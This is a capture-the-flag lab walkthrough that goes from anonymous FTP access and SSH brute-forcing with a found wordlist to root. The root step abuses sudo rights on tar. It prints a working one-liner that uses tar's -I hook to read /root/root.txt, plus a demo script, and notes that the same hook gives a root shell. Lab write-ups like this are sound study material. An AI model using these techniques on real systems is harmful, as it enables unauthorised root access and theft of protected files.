Enumeration
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Three ports are open. We start with FTP to check whether anonymous login is allowed:
User own
Anonymous login works without a password, and there are a couple of files available. Let's look at the task file:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
The task file is signed by lin, which gives us a username, and locks looks to be a wordlist. As per the room's hint, we can try brute-forcing the SSH service with that username and wordlist:
We can SSH in with the recovered password and immediately grab the user flag.
Root own
Our path to root is obvious almost immediately. Checking our sudo rights (sudo -l) shows that tar can be run as root; sudo still asks for a password, but we already have lin's:
https://gtfobins.github.io/gtfobins/tar/
At this point it's just a matter of picking your favourite entry from that page. Rather than spawning a shell, let's try something slightly less common and simply read the flag file:
sudo tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'
We get the root flag with no issues. This works because tar treats the -I argument as its decompression program and pipes the "archive" into it on stdin, so the inner command receives the raw contents of /root/root.txt and copies them to stderr, where they land on our terminal. The same hook would happily run any other command as root.
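To see the mechanism behind the tar command above without needing root, here is an added example (not part of the original writeup) that runs the same trick unprivileged against a throwaway file. The sample file and its contents are constructed for the demonstration; on the box the identical invocation runs via sudo against /root/root.txt.

```shell
#!/bin/sh
# Added example: why `tar xf FILE -I CMD` prints an arbitrary file.
# tar treats the -I argument as the decompression program and feeds it
# the "archive" on stdin, so the archive can be any readable file and
# the program any command we choose. tar itself consumes the child's
# stdout as the decompressed stream, which is why the inner command
# writes to stderr instead.

# Read a file through tar's decompression hook. stderr is routed back
# to stdout so the caller can capture the contents.
tar_read_file() {
    tar xf "$1" -I '/bin/sh -c "cat 1>&2"' 2>&1
}

# Constructed sample input standing in for /root/root.txt.
SAMPLE="$(mktemp)"
printf 'flag{constructed-sample-flag}\n' > "$SAMPLE"

# Usage: the contents come back verbatim even though we never ran cat
# on the path ourselves; only tar ever saw the filename.
tar_read_file "$SAMPLE"
rm -f "$SAMPLE"
```

Run on the target with sudo in front of the tar call, the decompressor inherits root, so the same one-liner reads any file root can; swapping the inner command for a shell (as the GTFOBins sudo entry does) gives a root shell instead of a single file.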